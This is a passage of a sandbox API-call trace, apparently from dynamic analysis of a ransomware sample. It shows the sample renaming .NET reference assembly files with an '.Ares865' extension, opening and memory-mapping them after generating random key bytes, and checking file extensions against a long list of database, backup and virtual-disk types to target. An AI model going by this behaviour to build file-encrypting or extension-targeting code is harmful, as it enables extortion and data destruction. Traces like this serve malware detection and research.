(lpString1="System.Web.Entity.Design.dll", lpString2=".ini") returned 1 [0124.037] lstrlenW (lpString=".sys") returned 4 [0124.037] lstrcmpiW (lpString1="System.Web.Entity.Design.dll", lpString2=".sys") returned 1 [0124.037] lstrlenW (lpString="System.Web.Entity.Design.dll") returned 28 [0124.037] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll.Ares865") returned 105 [0124.037] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.design.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.design.dll.ares865"), dwFlags=0x1) returned 1 [0124.040] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.design.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.040] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=131072) returned 1 [0124.040] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.041] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.041] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.041] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20300, lpName=0x0) returned 0x170 [0124.043] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20300) returned 0x420000 [0124.049] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.050] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.050] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.052] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Web.Entity.dll" | out: lpString1="System.Web.Entity.dll") returned="System.Web.Entity.dll" [0124.052] lstrlenW (lpString="System.Web.Entity.dll") returned 21 [0124.052] lstrlenW (lpString="Ares865") returned 7 [0124.052] lstrcmpiW (lpString1="ity.dll", lpString2="Ares865") returned 1 [0124.052] lstrlenW (lpString=".dll") returned 4 [0124.052] lstrcmpiW (lpString1="System.Web.Entity.dll", lpString2=".dll") returned 1 [0124.052] lstrlenW (lpString=".lnk") returned 4 [0124.052] lstrcmpiW (lpString1="System.Web.Entity.dll", lpString2=".lnk") returned 1 [0124.052] lstrlenW (lpString=".ini") returned 4 [0124.052] lstrcmpiW (lpString1="System.Web.Entity.dll", lpString2=".ini") returned 1 [0124.052] lstrlenW (lpString=".sys") returned 4 [0124.053] lstrcmpiW (lpString1="System.Web.Entity.dll", lpString2=".sys") returned 1 [0124.053] lstrlenW (lpString="System.Web.Entity.dll") returned 21 [0124.053] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll.Ares865") returned 98 [0124.053] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.dll.ares865"), dwFlags=0x1) returned 1 [0124.055] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.056] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=139264) returned 1 [0124.056] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.056] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.057] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.057] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x22300, lpName=0x0) returned 0x170 [0124.058] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22300) returned 0x420000 [0124.065] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.066] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.066] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.068] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Web.Extensions.Design.dll" | out: lpString1="System.Web.Extensions.Design.dll") returned="System.Web.Extensions.Design.dll" [0124.068] lstrlenW (lpString="System.Web.Extensions.Design.dll") returned 32 [0124.068] lstrlenW (lpString="Ares865") returned 7 [0124.068] lstrcmpiW (lpString1="ign.dll", lpString2="Ares865") returned 1 [0124.068] lstrlenW (lpString=".dll") returned 4 [0124.068] lstrcmpiW (lpString1="System.Web.Extensions.Design.dll", lpString2=".dll") returned 1 [0124.068] lstrlenW (lpString=".lnk") returned 4 [0124.068] lstrcmpiW (lpString1="System.Web.Extensions.Design.dll", lpString2=".lnk") returned 1 [0124.068] lstrlenW (lpString=".ini") returned 4 [0124.068] lstrcmpiW (lpString1="System.Web.Extensions.Design.dll", lpString2=".ini") returned 1 [0124.068] lstrlenW (lpString=".sys") returned 4 [0124.068] lstrcmpiW (lpString1="System.Web.Extensions.Design.dll", lpString2=".sys") returned 1 [0124.068] lstrlenW (lpString="System.Web.Extensions.Design.dll") returned 32 [0124.069] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll.Ares865") returned 109 [0124.069] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.design.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.design.dll.ares865"), dwFlags=0x1) returned 1 [0124.071] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.design.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.071] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=335872) returned 1 [0124.071] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.072] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.072] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.072] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x52300, lpName=0x0) returned 0x170 [0124.074] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x52300) returned 0x420000 [0124.089] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.089] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.090] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.095] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Web.Extensions.dll" | out: lpString1="System.Web.Extensions.dll") returned="System.Web.Extensions.dll" [0124.095] lstrlenW (lpString="System.Web.Extensions.dll") returned 25 [0124.095] lstrlenW (lpString="Ares865") returned 7 [0124.095] lstrcmpiW (lpString1="ons.dll", lpString2="Ares865") returned 1 [0124.095] lstrlenW (lpString=".dll") returned 4 [0124.095] lstrcmpiW (lpString1="System.Web.Extensions.dll", lpString2=".dll") returned 1 [0124.095] lstrlenW (lpString=".lnk") returned 4 [0124.095] lstrcmpiW (lpString1="System.Web.Extensions.dll", lpString2=".lnk") returned 1 [0124.095] lstrlenW (lpString=".ini") returned 4 [0124.095] lstrcmpiW (lpString1="System.Web.Extensions.dll", lpString2=".ini") returned 1 [0124.095] lstrlenW (lpString=".sys") returned 4 [0124.095] lstrcmpiW (lpString1="System.Web.Extensions.dll", lpString2=".sys") returned 1 [0124.095] lstrlenW (lpString="System.Web.Extensions.dll") returned 25 [0124.095] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll.Ares865") returned 102 [0124.095] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.dll.ares865"), dwFlags=0x1) returned 1 [0124.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1277952) returned 1 [0124.098] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.099] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.099] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.099] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x138300, lpName=0x0) returned 0x170 [0124.101] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x138300) returned 0x3030000 [0124.152] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.152] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.152] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.170] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Web.Routing.dll" | out: lpString1="System.Web.Routing.dll") returned="System.Web.Routing.dll" [0124.170] lstrlenW (lpString="System.Web.Routing.dll") returned 22 [0124.170] lstrlenW (lpString="Ares865") returned 7 [0124.170] lstrcmpiW (lpString1="ing.dll", lpString2="Ares865") returned 1 [0124.170] lstrlenW (lpString=".dll") returned 4 [0124.171] lstrcmpiW (lpString1="System.Web.Routing.dll", lpString2=".dll") returned 1 [0124.171] lstrlenW (lpString=".lnk") returned 4 [0124.171] lstrcmpiW (lpString1="System.Web.Routing.dll", lpString2=".lnk") returned 1 [0124.171] lstrlenW (lpString=".ini") returned 4 [0124.171] lstrcmpiW (lpString1="System.Web.Routing.dll", lpString2=".ini") returned 1 [0124.171] lstrlenW (lpString=".sys") returned 4 [0124.171] lstrcmpiW (lpString1="System.Web.Routing.dll", lpString2=".sys") returned 1 [0124.171] lstrlenW (lpString="System.Web.Routing.dll") returned 22 [0124.171] lstrlenW (lpString="bak") returned 3 [0124.171] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0124.171] lstrlenW (lpString="ba_") returned 3 [0124.171] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0124.171] lstrlenW (lpString="dbb") returned 3 [0124.171] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0124.171] lstrlenW (lpString="vmdk") returned 4 [0124.171] lstrcmpiW (lpString1=".dll", lpString2="vmdk") returned -1 [0124.171] lstrlenW (lpString="rar") returned 3 [0124.171] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0124.171] lstrlenW (lpString="zip") returned 3 [0124.171] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0124.171] lstrlenW (lpString="tgz") returned 3 [0124.171] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0124.171] lstrlenW (lpString="vbox") returned 4 [0124.171] lstrcmpiW (lpString1=".dll", lpString2="vbox") returned -1 [0124.171] lstrlenW (lpString="vdi") returned 3 [0124.171] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0124.171] lstrlenW (lpString="vhd") returned 3 [0124.171] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0124.171] lstrlenW (lpString="vhdx") returned 4 [0124.171] lstrcmpiW (lpString1=".dll", lpString2="vhdx") returned -1 [0124.171] lstrlenW (lpString="avhd") returned 4 [0124.171] lstrcmpiW (lpString1=".dll", lpString2="avhd") returned -1 [0124.171] lstrlenW (lpString="db") returned 2 [0124.172] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0124.172] lstrlenW (lpString="db2") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0124.172] lstrlenW (lpString="db3") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0124.172] lstrlenW (lpString="dbf") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0124.172] lstrlenW (lpString="mdf") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0124.172] lstrlenW (lpString="mdb") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0124.172] lstrlenW (lpString="sql") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0124.172] lstrlenW (lpString="sqlite") returned 6 [0124.172] lstrcmpiW (lpString1="ng.dll", lpString2="sqlite") returned -1 [0124.172] lstrlenW (lpString="sqlite3") returned 7 [0124.172] lstrcmpiW (lpString1="ing.dll", lpString2="sqlite3") returned -1 [0124.172] lstrlenW (lpString="sqlitedb") returned 8 [0124.172] lstrcmpiW (lpString1="ting.dll", lpString2="sqlitedb") returned 1 [0124.172] lstrlenW (lpString="xml") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0124.172] lstrlenW (lpString="$er") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0124.172] lstrlenW (lpString="4dd") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0124.172] lstrlenW (lpString="4dl") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0124.172] lstrlenW (lpString="^^^") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0124.172] lstrlenW (lpString="abs") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0124.172] lstrlenW (lpString="abx") returned 3 [0124.172] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0124.172] lstrlenW (lpString="accdb") returned 5 [0124.173] lstrcmpiW (lpString1="g.dll", lpString2="accdb") returned 1 [0124.173] lstrlenW (lpString="accdc") returned 5 [0124.173] lstrcmpiW (lpString1="g.dll", lpString2="accdc") returned 1 [0124.173] lstrlenW (lpString="accde") returned 5 [0124.173] lstrcmpiW (lpString1="g.dll", lpString2="accde") returned 1 [0124.173] lstrlenW (lpString="accdr") returned 5 [0124.173] lstrcmpiW (lpString1="g.dll", lpString2="accdr") returned 1 [0124.173] lstrlenW (lpString="accdt") returned 5 [0124.173] lstrcmpiW (lpString1="g.dll", lpString2="accdt") returned 1 [0124.173] lstrlenW (lpString="accdw") returned 5 [0124.173] lstrcmpiW (lpString1="g.dll", lpString2="accdw") returned 1 [0124.173] lstrlenW (lpString="accft") returned 5 [0124.173] lstrcmpiW (lpString1="g.dll", lpString2="accft") returned 1 [0124.173] lstrlenW (lpString="adb") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0124.173] lstrlenW (lpString="adb") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0124.173] lstrlenW (lpString="ade") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0124.173] lstrlenW (lpString="adf") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0124.173] lstrlenW (lpString="adn") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0124.173] lstrlenW (lpString="adp") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0124.173] lstrlenW (lpString="alf") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0124.173] lstrlenW (lpString="ask") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0124.173] lstrlenW (lpString="btr") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0124.173] lstrlenW (lpString="cat") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0124.173] lstrlenW (lpString="cdb") returned 3 [0124.173] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0124.174] lstrlenW (lpString="ckp") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0124.174] lstrlenW (lpString="cma") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0124.174] lstrlenW (lpString="cpd") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0124.174] lstrlenW (lpString="dacpac") returned 6 [0124.174] lstrcmpiW (lpString1="ng.dll", lpString2="dacpac") returned 1 [0124.174] lstrlenW (lpString="dad") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0124.174] lstrlenW (lpString="dadiagrams") returned 10 [0124.174] lstrcmpiW (lpString1="outing.dll", lpString2="dadiagrams") returned 1 [0124.174] lstrlenW (lpString="daschema") returned 8 [0124.174] lstrcmpiW (lpString1="ting.dll", lpString2="daschema") returned 1 [0124.174] lstrlenW (lpString="db-journal") returned 10 [0124.174] lstrcmpiW (lpString1="outing.dll", lpString2="db-journal") returned 1 [0124.174] lstrlenW (lpString="db-shm") returned 6 [0124.174] lstrcmpiW (lpString1="ng.dll", lpString2="db-shm") returned 1 [0124.174] lstrlenW (lpString="db-wal") returned 6 [0124.174] lstrcmpiW (lpString1="ng.dll", lpString2="db-wal") returned 1 [0124.174] lstrlenW (lpString="dbc") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0124.174] lstrlenW (lpString="dbs") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0124.174] lstrlenW (lpString="dbt") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0124.174] lstrlenW (lpString="dbv") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0124.174] lstrlenW (lpString="dbx") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0124.174] lstrlenW (lpString="dcb") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0124.174] lstrlenW (lpString="dct") returned 3 [0124.174] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0124.175] lstrlenW (lpString="dcx") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0124.175] lstrlenW (lpString="ddl") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0124.175] lstrlenW (lpString="dlis") returned 4 [0124.175] lstrcmpiW (lpString1=".dll", lpString2="dlis") returned -1 [0124.175] lstrlenW (lpString="dp1") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0124.175] lstrlenW (lpString="dqy") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0124.175] lstrlenW (lpString="dsk") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0124.175] lstrlenW (lpString="dsn") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0124.175] lstrlenW (lpString="dtsx") returned 4 [0124.175] lstrcmpiW (lpString1=".dll", lpString2="dtsx") returned -1 [0124.175] lstrlenW (lpString="dxl") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0124.175] lstrlenW (lpString="eco") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0124.175] lstrlenW (lpString="ecx") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0124.175] lstrlenW (lpString="edb") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0124.175] lstrlenW (lpString="epim") returned 4 [0124.175] lstrcmpiW (lpString1=".dll", lpString2="epim") returned -1 [0124.175] lstrlenW (lpString="fcd") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0124.175] lstrlenW (lpString="fdb") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0124.175] lstrlenW (lpString="fic") returned 3 [0124.175] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0124.175] lstrlenW (lpString="flexolibrary") returned 12 [0124.175] lstrcmpiW (lpString1=".Routing.dll", lpString2="flexolibrary") returned -1 [0124.176] lstrlenW (lpString="fm5") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0124.176] lstrlenW (lpString="fmp") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0124.176] lstrlenW (lpString="fmp12") returned 5 [0124.176] lstrcmpiW (lpString1="g.dll", lpString2="fmp12") returned 1 [0124.176] lstrlenW (lpString="fmpsl") returned 5 [0124.176] lstrcmpiW (lpString1="g.dll", lpString2="fmpsl") returned 1 [0124.176] lstrlenW (lpString="fol") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0124.176] lstrlenW (lpString="fp3") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0124.176] lstrlenW (lpString="fp4") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0124.176] lstrlenW (lpString="fp5") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0124.176] lstrlenW (lpString="fp7") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0124.176] lstrlenW (lpString="fpt") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0124.176] lstrlenW (lpString="frm") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0124.176] lstrlenW (lpString="gdb") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0124.176] lstrlenW (lpString="gdb") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0124.176] lstrlenW (lpString="grdb") returned 4 [0124.176] lstrcmpiW (lpString1=".dll", lpString2="grdb") returned -1 [0124.176] lstrlenW (lpString="gwi") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0124.176] lstrlenW (lpString="hdb") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0124.176] lstrlenW (lpString="his") returned 3 [0124.176] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0124.177] lstrlenW (lpString="ib") returned 2 [0124.177] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0124.177] lstrlenW (lpString="idb") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0124.177] lstrlenW (lpString="ihx") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0124.177] lstrlenW (lpString="itdb") returned 4 [0124.177] lstrcmpiW (lpString1=".dll", lpString2="itdb") returned -1 [0124.177] lstrlenW (lpString="itw") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0124.177] lstrlenW (lpString="jet") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0124.177] lstrlenW (lpString="jtx") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0124.177] lstrlenW (lpString="kdb") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0124.177] lstrlenW (lpString="kexi") returned 4 [0124.177] lstrcmpiW (lpString1=".dll", lpString2="kexi") returned -1 [0124.177] lstrlenW (lpString="kexic") returned 5 [0124.177] lstrcmpiW (lpString1="g.dll", lpString2="kexic") returned -1 [0124.177] lstrlenW (lpString="kexis") returned 5 [0124.177] lstrcmpiW (lpString1="g.dll", lpString2="kexis") returned -1 [0124.177] lstrlenW (lpString="lgc") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0124.177] lstrlenW (lpString="lwx") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0124.177] lstrlenW (lpString="maf") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0124.177] lstrlenW (lpString="maq") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0124.177] lstrlenW (lpString="mar") returned 3 [0124.177] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0124.177] lstrlenW (lpString="marshal") returned 7 [0124.177] lstrcmpiW (lpString1="ing.dll", lpString2="marshal") returned -1 [0124.177] lstrlenW (lpString="mas") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0124.178] lstrlenW (lpString="mav") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0124.178] lstrlenW (lpString="maw") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0124.178] lstrlenW (lpString="mdbhtml") returned 7 [0124.178] lstrcmpiW 